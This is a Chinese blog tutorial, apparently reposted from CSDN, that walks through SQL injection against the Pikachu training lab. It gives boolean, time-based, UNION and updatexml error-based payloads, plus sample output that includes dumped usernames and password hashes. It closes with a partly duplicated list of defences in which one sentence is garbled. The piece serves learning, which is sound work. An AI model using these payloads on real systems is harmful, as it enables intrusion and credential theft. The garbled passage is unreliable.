数据库
首页 > 数据库> > 渗透测试之SQL注入漏洞

渗透测试之SQL注入漏洞

作者:互联网

文章目录

SQL注入

​ 字符型的注入(加单引号)和 数字型的注入

1' or 1=1#

查出所有数据。

SQL盲注

​ 在服务器没有错误回显时完成注入攻击,服务器没有回显,对攻击者来说缺少了重要调试信息,所以攻击者必须找到一个方法验证注入的SQL语句是否被执行。

分类:布尔盲注,时间盲注,

布尔盲注

select *from 表名 where id = x
可以使用经典的 and 1=1 和 and 1=2 
在url中输入http:xxxx/abc.php?id=x and 1=1  看页面是否正常运行

在url中输入http:xxxx/abc.php?id=x and 1=2  看页面是否报错
例子
http://localhost/pikachu-master/vul/sqli/sqli_blind_b.phpname=kobe%27+and+1%3D1%23&submit=%E6%9F%A5%E8%AF%A2
kobe' and 1=1#

kobe' and 1=2#

kobe’ and(length(database())>5)# 尝试获取数据库名的长度

kobe’ and(length(database())>7)# 错误 不大于7 大于5那么长度就是5;

时间盲注

​ 基于布尔盲注,结合if判断和sleep()函数来得到一个时间上的变换延迟的参照。

and if(length(database())>5,0)

kobe' and if(length(database())>5,sleep(5),0)#   

联合盲注

猜字段,猜数据库名字

## 猜测查询的字段数
kobe' order by 1#    
kobe' order by 2#
kobe' order by 3#

##Unknown column '3' in 'order clause'

Unknown column ‘3’ in ‘order clause’ 表面一共有两个字段。

猜测数据库名字 union select联合查询继续获取信息。

要求 :两个表的列数一样。 union运算符可以将两个以上的select语句的查询结果集合合并成一个结果集合显示。

kobe' union select database(),user()#
结果:获得额外的结果
your uid:3
your email is: kobe@pikachu.com

your uid:pikachu
your email is: root@localhost

获取数据库版本和当前操作系统

kobe' union select version(),@@version_compile_os#

your uid:3
your email is: kobe@pikachu.com

your uid:5.7.26
your email is: Win64

尝试获取pikachu数据库中的表名

	该数据库拥有一个名为 tables 的数据表,该表包含两个字段 table_name 和 table_schema,分别记录 DBMS 中的存储的表名和表名所在的数据库

##  1.是用来凑数的,因为有两个字段。
kobe ' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#

执行结果:

your uid:3

your email is: kobe@pikachu.com

your uid:1
your email is: httpinfo,member,message,users,xssblind

根据经验猜测

## 有经验的黑客会去猜测数据库的表明
## 猜测存在 users,所以输入
kobe' union select 1,2 from users#
kobe' and exists(select * from users)#

尝试获取users表中的字段名

## 1 为了凑2个字段
kobe' union select 1,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users' #
数据库是当前数据库  表面位users

结果:

your uid:1
your email is: id,username,password,level

6.尝试获取用户名和密码

kobe' union select username,password from users#

执行结果:

your uid:admin
your email is: e10adc3949ba59abbe56e057f20f883e

your uid:pikachu
your email is: 670b14728ad9902aecba32e22fa4f6bd

your uid:test
your email is: e99a18c428cb38d5f260853678922e03

​ 成功获得了用户名和密码,一共两个字段。但是这个密码采取了md5加密。

数字型注入

用fiddler抓包 用向上的断点抓取请求,修改参数位 1 or 1=1# 查询到所有信息

结果为:

hello,vince
your email is: vince@pikachu.com

hello,allen
your email is: allen@pikachu.com

hello,kobe
your email is: kobe@pikachu.com

hello,grady
your email is: grady@pikachu.com

hello,kevin
your email is: kevin@pikachu.com

hello,lucy
your email is: lucy@pikachu.com

hello,lili
your email is: lili@pikachu.com

​ 在注册是进行sql注入。网站返回的是数据库的报错信息,因此可以进行报错注入。

## 1 为参数  第二个参数为具体的节点。 要拿到数据库的名字。
kobe' or updatexml(1,concat(0x7e,database()),1) or'

执行结果:XPATH syntax error: ‘~pikachu’

0' or updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='pikachu' )),0) or '

sql注入步骤

​ 判断注入点,判断字段数,判断回显点,查询相关内容。

怎样防御SQL注入漏洞

​ 1.使用参数化的过滤性语句。

​ 参数化:where name =? java开发后端时使用PreparedStatement ,字符串拼接就是非参数化。 在使用mybatis框架时减少 的 使 用 , 非 必 要 不 使 用 的使用,非必要不使用 的使用,非必要不使用,使用#替代。。

​ 2.输入验证。

​ 敏感命令过滤

​ 3.错误消息处理

​ 敏感信息不显示

​ 4.加密处理,md5是最基本的可以再加一个随机字符处理

​ 5.存储过程来执行所有的查询

​ 6.使用专业的漏洞扫描工具

​ 7.确保数据库安全

? java开发后端时使用PreparedStatement ,字符串拼接就是非参数化。 在使用mybatis框架时减少 的 使 用 , 非 必 要 不 使 用 的使用,非必要不使用 的使用,非必要不使用,使用#替代。。

​ 2.输入验证。

​ 敏感命令过滤

​ 3.错误消息处理

​ 敏感信息不显示

​ 4.加密处理,md5是最基本的可以再加一个随机字符处理

​ 5.存储过程来执行所有的查询

​ 6.使用专业的漏洞扫描工具

​ 7.确保数据库安全

标签:渗透,pikachu,数据库,your,漏洞,SQL,kobe,email,select
来源: https://blog.csdn.net/gao1213977085/article/details/120514550